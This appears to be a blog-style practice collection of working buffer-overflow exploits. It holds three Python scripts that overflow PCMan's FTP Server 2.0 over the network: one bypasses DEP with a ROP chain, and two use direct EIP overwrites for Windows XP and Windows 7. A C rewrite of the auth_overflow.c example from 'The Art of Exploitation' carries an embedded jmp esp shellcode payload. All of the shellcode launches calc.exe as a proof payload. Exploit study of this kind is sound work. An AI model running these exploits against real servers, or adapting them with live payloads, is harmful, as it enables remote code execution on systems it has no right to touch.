[Part 2] PCMan FTP 2.0.7 BoF (DEP)

Bypass DEP ( Data Execution Prevention) with ROP (Return-oriented programming )

#!/usr/bin/python
#
#
###################################################################
#
# Exploit Title: PCMan's FTP Server 2.0 Remote Buffer Overflow Exploit (DEP)
# Date: 2019/10/10
# Exploit Author: Chako
# Vendor Homepage: http://pcman.openfoundry.org/
# Software Download Link: https://files.secureserver.net/1sMltFOsytirTG
# Version: 2.0
# Tested on: Windows XP SP3 English
#
# EAX 00000000
# ECX 00000000
# EDX 0000000B
# EBX 00000000
# ESP 0012EDB8 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
# EBP 00A31C50
# ESI 0012EDC4 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
# EDI 00000004
# EIP 41414141
#
####################################################################
import socket
import sys
import struct

USER    = "anonymous"
PASSWD  = "TEST"



def create_rop_chain():

    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
	  0x77c2fb30,  # POP ECX # RETN [msvcrt.dll] 
	  0x41414141,  # add a 4 bytes data to fit retn 0x4 from the last function's retn before eip=rop_gadgets
      0x77c11120,  # ptr to &VirtualProtect() [IAT msvcrt.dll]
      0x7e41927f,  # MOV EAX,DWORD PTR DS:[ECX] # RETN [USER32.dll] 
      0x763cc3d8,  # XCHG EAX,ESI # RETN [comdlg32.dll]
	  
      0x77c244c6,  # POP EBP # RETN [msvcrt.dll] 
      0x74e331a9,  # & jmp esp [RICHED20.dll]
	  
      0x7c880176,  # POP EAX # RETN [kernel32.dll] 
      0xfffffdff,  # Value to negate, will become 0x00000201
      0x77e8c784,  # NEG EAX # RETN [RPCRT4.dll] 
      0x7c9059c8,  # XCHG EAX,EBX # RETN [ntdll.dll] 
	  
      0x77c4ded4,  # POP EAX # RETN [msvcrt.dll] 
      0xffffffc0,  # Value to negate, will become 0x00000040
      0x71a7c15c,  # NEG EAX # RETN [mswsock.dll]   ######
      0x7c8409d4,  # XCHG EAX,EDX # RETN [kernel32.dll]   
	  
      0x77c3ea01,  # POP ECX # RETN [msvcrt.dll] 
      0x74e9121e,  # &Writable location [RICHED20.dll]
	  
      0x77c3aeca,  # POP EDI # RETN [msvcrt.dll] 
      0x74e46463,  # RETN (ROP NOP) [RICHED20.dll]
      0x77c21d16,  # POP EAX # RETN [msvcrt.dll] 
      0x90909090,  # nop
      0x77e160c7,  # PUSHAD # RETN [ADVAPI32.dll] 
    ]
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)



rop_chain = create_rop_chain()
rop_chain = rop_chain.replace('\x00','')

#msfvenom -p windows/exec cmd=calc.exe -b '\x0a\x00\x0d' -f python -v SHELLCODE
SHELLCODE =  b""
SHELLCODE += b"\xba\x3e\xfa\x2c\xca\xd9\xc4\xd9\x74\x24\xf4"
SHELLCODE += b"\x5d\x33\xc9\xb1\x31\x83\xed\xfc\x31\x55\x0f"
SHELLCODE += b"\x03\x55\x31\x18\xd9\x36\xa5\x5e\x22\xc7\x35"
SHELLCODE += b"\x3f\xaa\x22\x04\x7f\xc8\x27\x36\x4f\x9a\x6a"
SHELLCODE += b"\xba\x24\xce\x9e\x49\x48\xc7\x91\xfa\xe7\x31"
SHELLCODE += b"\x9f\xfb\x54\x01\xbe\x7f\xa7\x56\x60\xbe\x68"
SHELLCODE += b"\xab\x61\x87\x95\x46\x33\x50\xd1\xf5\xa4\xd5"
SHELLCODE += b"\xaf\xc5\x4f\xa5\x3e\x4e\xb3\x7d\x40\x7f\x62"
SHELLCODE += b"\xf6\x1b\x5f\x84\xdb\x17\xd6\x9e\x38\x1d\xa0"
SHELLCODE += b"\x15\x8a\xe9\x33\xfc\xc3\x12\x9f\xc1\xec\xe0"
SHELLCODE += b"\xe1\x06\xca\x1a\x94\x7e\x29\xa6\xaf\x44\x50"
SHELLCODE += b"\x7c\x25\x5f\xf2\xf7\x9d\xbb\x03\xdb\x78\x4f"
SHELLCODE += b"\x0f\x90\x0f\x17\x13\x27\xc3\x23\x2f\xac\xe2"
SHELLCODE += b"\xe3\xa6\xf6\xc0\x27\xe3\xad\x69\x71\x49\x03"
SHELLCODE += b"\x95\x61\x32\xfc\x33\xe9\xde\xe9\x49\xb0\xb4"
SHELLCODE += b"\xec\xdc\xce\xfa\xef\xde\xd0\xaa\x87\xef\x5b"
SHELLCODE += b"\x25\xdf\xef\x89\x02\x2f\xba\x90\x22\xb8\x63"
SHELLCODE += b"\x41\x77\xa5\x93\xbf\xbb\xd0\x17\x4a\x43\x27"
SHELLCODE += b"\x07\x3f\x46\x63\x8f\xd3\x3a\xfc\x7a\xd4\xe9"
SHELLCODE += b"\xfd\xae\xb7\x6c\x6e\x32\x16\x0b\x16\xd1\x66"


JUNK = "\x41" * 2010
EIP  = "\x10\xB3\x45\x7E"  # 7E45B310    JMP ESP USER32.DLL
NOP  = "\x90" * 4

PADDING = "\x43" * (3000 - len(JUNK) - len(rop_chain) - len(NOP) - len(SHELLCODE))
print len(PADDING)


print("\n\n[+] PCMan's FTP Server 2.0 Rrmote Buffer Overflow Exploit")
print("[+] Version: V2.0")
print("[+] Chako\n\n\n")

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.1.80",21))
data = s.recv(1024)

print("[-] Login to FTP Server...\n")
s.send("USER " + USER + '\r\n')
data = s.recv(1024)


s.send("PASS " + PASSWD + '\r\n')
data = s.recv(1024)

print("[-] Sending exploit...\n")
#s.send(JUNK + EIP + NOP + SHELLCODE  + PADDING + '\r\n')
#s.send(JUNK + "\x44\x44\x44\x44"+rop_chain + NOP + SHELLCODE  + PADDING + '\r\n')
s.send(JUNK + rop_chain + NOP + SHELLCODE  + PADDING + '\r\n')
s.close()

print("[!] Done! Exploit successfully sent\n")

[Part 1] PCMan FTP 2.0.7 BoF

Found this vulnerability years ago and now I just kinda rewrite the exploit for education and practice purpose .

#!/usr/bin/python
#
#
###################################################################
#
# Exploit Title: PCMan's FTP Server 2.0 Remote Buffer Overflow Exploit
# Date: 2019/10/08
# Exploit Author: Chako
# Vendor Homepage: http://pcman.openfoundry.org/
# Software Download Link: https://files.secureserver.net/1sMltFOsytirTG
# Version: 2.0
# Tested on: Windows XP SP3 English
#
# EAX 00000000
# ECX 00000000
# EDX 0000000B
# EBX 00000000
# ESP 0012EDB8 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
# EBP 00A31C50
# ESI 0012EDC4 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
# EDI 00000004
# EIP 41414141
#
####################################################################
import socket
import sys

USER    = "anonymous"
PASSWD  = "TEST"

# Address=7E45B310
# Message=  0x7e45b310 : jmp esp |  {PAGE_EXECUTE_READ} 
# [USER32.dll] ASLR: False, Rebase: False, # # SafeSEH: True, OS: True, 
# v5.1.2600.5512 (C:\WINDOWS\system32\USER32.dll) (C:#WINDOWS\system32\USER32.dll)
JUNK = "\x41" * 2011
EIP     = "\x10\xB3\x45\x7E"  # 7E45B310    JMP ESP USER32.DLL
NOP     = "\x90" * 10

#msfvenom -p windows/exec cmd=calc.exe -b '\x0a\x00\x0d' -f python -v SHELLCODE
SHELLCODE =  b""
SHELLCODE += b"\xba\x3e\xfa\x2c\xca\xd9\xc4\xd9\x74\x24\xf4"
SHELLCODE += b"\x5d\x33\xc9\xb1\x31\x83\xed\xfc\x31\x55\x0f"
SHELLCODE += b"\x03\x55\x31\x18\xd9\x36\xa5\x5e\x22\xc7\x35"
SHELLCODE += b"\x3f\xaa\x22\x04\x7f\xc8\x27\x36\x4f\x9a\x6a"
SHELLCODE += b"\xba\x24\xce\x9e\x49\x48\xc7\x91\xfa\xe7\x31"
SHELLCODE += b"\x9f\xfb\x54\x01\xbe\x7f\xa7\x56\x60\xbe\x68"
SHELLCODE += b"\xab\x61\x87\x95\x46\x33\x50\xd1\xf5\xa4\xd5"
SHELLCODE += b"\xaf\xc5\x4f\xa5\x3e\x4e\xb3\x7d\x40\x7f\x62"
SHELLCODE += b"\xf6\x1b\x5f\x84\xdb\x17\xd6\x9e\x38\x1d\xa0"
SHELLCODE += b"\x15\x8a\xe9\x33\xfc\xc3\x12\x9f\xc1\xec\xe0"
SHELLCODE += b"\xe1\x06\xca\x1a\x94\x7e\x29\xa6\xaf\x44\x50"
SHELLCODE += b"\x7c\x25\x5f\xf2\xf7\x9d\xbb\x03\xdb\x78\x4f"
SHELLCODE += b"\x0f\x90\x0f\x17\x13\x27\xc3\x23\x2f\xac\xe2"
SHELLCODE += b"\xe3\xa6\xf6\xc0\x27\xe3\xad\x69\x71\x49\x03"
SHELLCODE += b"\x95\x61\x32\xfc\x33\xe9\xde\xe9\x49\xb0\xb4"
SHELLCODE += b"\xec\xdc\xce\xfa\xef\xde\xd0\xaa\x87\xef\x5b"
SHELLCODE += b"\x25\xdf\xef\x89\x02\x2f\xba\x90\x22\xb8\x63"
SHELLCODE += b"\x41\x77\xa5\x93\xbf\xbb\xd0\x17\x4a\x43\x27"
SHELLCODE += b"\x07\x3f\x46\x63\x8f\xd3\x3a\xfc\x7a\xd4\xe9"
SHELLCODE += b"\xfd\xae\xb7\x6c\x6e\x32\x16\x0b\x16\xd1\x66"

print("\n\n[+] PCMan's FTP Server 2.0 Rrmote Buffer Overflow Exploit")
print("[+] Version: V2.0")
print("[+] Chako\n\n\n")

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.1.80",21))
data = s.recv(1024)

print("[-] Login to FTP Server...\n")
s.send("USER " + USER + '\r\n')
data = s.recv(1024)


s.send("PASS " + PASSWD + '\r\n')
data = s.recv(1024)

print("[-] Sending exploit...\n")
s.send(JUNK + EIP + NOP + SHELLCODE +'\r\n')
s.close()

print("[!] Done! Exploit successfully sent\n")

Win7 x32 SP1

#!/usr/bin/python
#
#
####################################################################
#
# Exploit Title: PCMan's FTP Server 2.0 Remote Buffer Overflow Exploit
# Date: 2019/10/08
# Exploit Author: Chako
# Vendor Homepage: http://pcman.openfoundry.org/
# Software Download Link: https://files.secureserver.net/1sMltFOsytirTG
# Version: 2.0
# Tested on: Windows 7 SP 1 English
#
####################################################################



import socket
import sys


USER    = "anonymous"
PASSWD  = "TEST"

JUNK = "\x41" * 2011
EIP     = "\x5B\x4E\x1C\x76"  # 761C4E5B    JMP ESP USER32.DLL
NOP     = "\x90" * 10


#msfvenom -p windows/exec cmd=calc.exe -b '\x0a\x00\x0d' -f python -v SHELLCODE
SHELLCODE =  b""
SHELLCODE += b"\xba\x3e\xfa\x2c\xca\xd9\xc4\xd9\x74\x24\xf4"
SHELLCODE += b"\x5d\x33\xc9\xb1\x31\x83\xed\xfc\x31\x55\x0f"
SHELLCODE += b"\x03\x55\x31\x18\xd9\x36\xa5\x5e\x22\xc7\x35"
SHELLCODE += b"\x3f\xaa\x22\x04\x7f\xc8\x27\x36\x4f\x9a\x6a"
SHELLCODE += b"\xba\x24\xce\x9e\x49\x48\xc7\x91\xfa\xe7\x31"
SHELLCODE += b"\x9f\xfb\x54\x01\xbe\x7f\xa7\x56\x60\xbe\x68"
SHELLCODE += b"\xab\x61\x87\x95\x46\x33\x50\xd1\xf5\xa4\xd5"
SHELLCODE += b"\xaf\xc5\x4f\xa5\x3e\x4e\xb3\x7d\x40\x7f\x62"
SHELLCODE += b"\xf6\x1b\x5f\x84\xdb\x17\xd6\x9e\x38\x1d\xa0"
SHELLCODE += b"\x15\x8a\xe9\x33\xfc\xc3\x12\x9f\xc1\xec\xe0"
SHELLCODE += b"\xe1\x06\xca\x1a\x94\x7e\x29\xa6\xaf\x44\x50"
SHELLCODE += b"\x7c\x25\x5f\xf2\xf7\x9d\xbb\x03\xdb\x78\x4f"
SHELLCODE += b"\x0f\x90\x0f\x17\x13\x27\xc3\x23\x2f\xac\xe2"
SHELLCODE += b"\xe3\xa6\xf6\xc0\x27\xe3\xad\x69\x71\x49\x03"
SHELLCODE += b"\x95\x61\x32\xfc\x33\xe9\xde\xe9\x49\xb0\xb4"
SHELLCODE += b"\xec\xdc\xce\xfa\xef\xde\xd0\xaa\x87\xef\x5b"
SHELLCODE += b"\x25\xdf\xef\x89\x02\x2f\xba\x90\x22\xb8\x63"
SHELLCODE += b"\x41\x77\xa5\x93\xbf\xbb\xd0\x17\x4a\x43\x27"
SHELLCODE += b"\x07\x3f\x46\x63\x8f\xd3\x3a\xfc\x7a\xd4\xe9"
SHELLCODE += b"\xfd\xae\xb7\x6c\x6e\x32\x16\x0b\x16\xd1\x66"



print("\n\n[+] PCMan's FTP Server 2.0 Rrmote Buffer Overflow Exploit")
print("[+] Version: V2.0")
print("[+] Chako\n\n\n")

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.1.85",21))
data = s.recv(1024)

print("[-] Login to FTP Server...\n")
s.send("USER " + USER + '\r\n')
data = s.recv(1024)

s.send("PASS " + PASSWD + '\r\n')
data = s.recv(1024)


print("[-] Sending exploit...\n")
s.send(JUNK + EIP + NOP + SHELLCODE +'\r\n')
s.close()

print("[!] Done! Exploit successfully sent\n")

rewrite and practice – auth_overflow.c

auth_overflow.c is the example code from book the ” The art of Exploitation ” I rewrite the example code as following to exploit the program.

Tested on win XP

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int check_authentication(char *password) {
  int auth_flag = 0;
  char password_buffer[16];

  strcpy(password_buffer, password);

  if(strcmp(password_buffer, "brillig") == 0)
    auth_flag = 1;
  if(strcmp(password_buffer, "outgrabe") == 0)
    auth_flag = 1;

  return auth_flag;
}

char payload[]="\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
               "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
               "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
               "\x41\x41"
               "\x7b\x46\x86\x7c" //0x7c86467b : jmp esp |  {PAGE_EXECUTE_READ} [kernel32.dll]
               "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"  //NOP
               //Shellcode pop up a calc.exe
               "\x31\xC9"                // xor ecx,ecx        
               "\x51"                    // push ecx        
               "\x68\x63\x61\x6C\x63"    // push 0x636c6163        
              "\x54"                    // push dword ptr esp        
              "\xB8\xC7\x93\xC2\x77"    // mov eax,0x77c293c7      
              "\xFF\xD0"; 



//Address=7C86467B
//Message=  0x7c86467b : jmp esp |  {PAGE_EXECUTE_READ} [kernel32.dll] 
//ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 
// (C:\WINDOWS\system32\kernel32.dll)

int main(int argc, char *argv[]) {

  if(check_authentication(payload)) {
    printf("-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");
    printf("       Access Granted\n");
    printf("-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");
  } else {
    printf("Access Denied.\n");
  }
}